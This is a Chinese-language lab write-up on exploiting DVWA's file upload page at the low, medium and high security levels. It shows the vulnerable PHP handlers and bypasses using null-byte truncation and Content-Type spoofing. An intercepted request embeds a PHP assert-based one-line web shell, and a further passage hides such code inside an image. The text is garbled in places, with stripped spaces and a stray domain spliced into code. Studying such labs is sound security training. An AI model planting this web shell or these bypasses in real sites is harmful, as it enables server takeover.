DWVA上传漏洞挖掘的测试例子
low:
if(isset($_POST[''Upload''])){???//Wherearewegoingtobewritingto????$target_path?=DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";???$target_path.=basename($_FILES[''uploaded''][''name'']);
???//Canwemovethefiletotheuploadfolder????if(!move_uploaded_file($_FILES[''uploaded''][''tmp_name''],$target_path)){???????//No???????echo''Yourimagewasnotuploaded. '';???}???else{???????//Yes!???????echo"{$target_path}succesfullyuploaded!";???}}
?>没有对文件类型进行限制,直接将php文件上传,之后访问:http://localhost/hackable/uploads/XX.php即可。
medium:
if(isset($_POST[''Upload''])){???//Wherearewegoingtobewritingto????$target_path?=DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";???$target_path.=basename($_FILES[''uploaded''][''name'']);
???//Fileinformation???$uploaded_name=$_FILES[''uploaded''][''name''];???$uploaded_type=$_FILES[''uploaded''][''type''];???$uploaded_size=$_FILES[''uploaded''][''size''];
???//Isitanimage????if(($uploaded_type=="image/jpeg"||$uploaded_type=="image/png")&&???????($uploaded_size<100000)){
???????//Canwemovethefiletotheuploadfolder????????if(!move_uploaded_file($_FILES[''uploaded''][''tmp_name''],$target_path)){???????????//No???????????echo''Yourimagewasnotuploaded. '';???????}???????else{???????????//Yes!???????????echo"{$target_path}succesfullyuploaded!";???????}???}???else{???????//Invalidfile???????echo''Yourimagewasnotuploaded.WecanonlyacceptJPEGorPNGimages. '';???}}
?>对上传的文件进行限制。解决方法1:用burpsuite进行00截断,将文件名改为1.php.jpg(注意中间有空格)然后在拦截中将空格改为00。解决方法2:直接上传2.php文件之后进行拦截,数据包如下
POST/vulnerabilities/upload/HTTP/1.1Host:localhostUser-Agent:Mozilla/5.0(WindowsNT6.1;rv:43.0)Gecko/20100101Firefox/43.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding:gzip,deflateReferer:http://localhost/vulnerabilities/upload/Cookie:PHPSESSID=pgke4molj8bath1fmdh7mvt686;security=mediumConnection:keep-aliveContent-Type:multipart/form-data;boundary=---------------------------143381619322555Content-Length:549
-----------------------------143381619322555Content-Disposition:form-data;name="MAX_FILE_SIZE"
100000-----------------------------143381619322555Content-Disposition:form-data;name="uploaded";filename="2.php"Content-Type:application/octet-stream
$item[''wind'']=''assert'';
$array[]=$item;
$array[0][''wind'']($_POST[''loveautumn'']);
?>-----------------------------143381619322555Content-Disposition:form-data;name="Upload"
Upload-----------------------------143381619322555--将红色的部分修改成:Content-Type:image/jpeg即可绕过。
High:
if(isset($_POST[''Upload''])){???//Wherearewegoingtobewritingto????$target_path?=DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";???$target_path.=basename($_FILES[''uploaded''][''name'']);
???//Fileinformation???$uploaded_name=$_FILES[''uploaded''][''name''];???$uploaded_ext?=?substr($uploaded_name,strrpos($uploaded_name,''.'')+1);???$uploaded_size=$_FILES[''uploaded''][''size''];???$uploaded_tmp?=$_FILES[''uploaded''][''tmp_name''];
???//Isitanimage????if((strtolower($uplwww.shanxiwang.netoaded_ext)=="jpg"||strtolower($uploaded_ext)=="jpeg"||strtolower($uploaded_ext)=="png")&&???????($uploaded_size<100000)&&???????getimagesize($uploaded_tmp)){
???????//Canwemovethefiletotheuploadfolder????????if(!move_uploaded_file($uploaded_tmp,$target_path)){???????????//No???????????echo''Yourimagewasnotuploaded. '';???????}???????else{???????????//Yes!???????????echo"{$target_path}succesfullyuploaded!";???????}???}???else{???????//Invalidfile???????echo''Yourimagewasnotuploaded.WecanonlyacceptJPEGorPNGimages. '';???}}
?>对图片的命名和类型进行了严格的限制,那么可以用文件头欺骗的方式来解决这个问题。另外,假设文件名为1.php.png,strrpos会截取.出现的最后位置是5,之后substr从第六位开始重新命名文件名,也就是最终上传的文件名会被改成png,会被拦截掉。首先使用记事本对正常图片文件编辑,将php一句话代码写到图片最下面,保存。这样就可以欺骗文件类型的检测。最后对文件名的重命名进行绕过。将文件名改为1.php.png上传,用burpsuite拦截:Content-Disposition:form-data;name="uploaded";filename="1.php.png"部分修改为Content-Disposition:form-data;name="uploaded";filename="1.php\X00.php.png"的话可以获得一个x00.php.png文件,这个是之前有php任意文件上传漏洞的文章中提到过的。对空格截断无效。目前不知道最终答案,可能是上传一个含有一句话的jpg文件之后采用文件包含来完成?暂时存疑
|
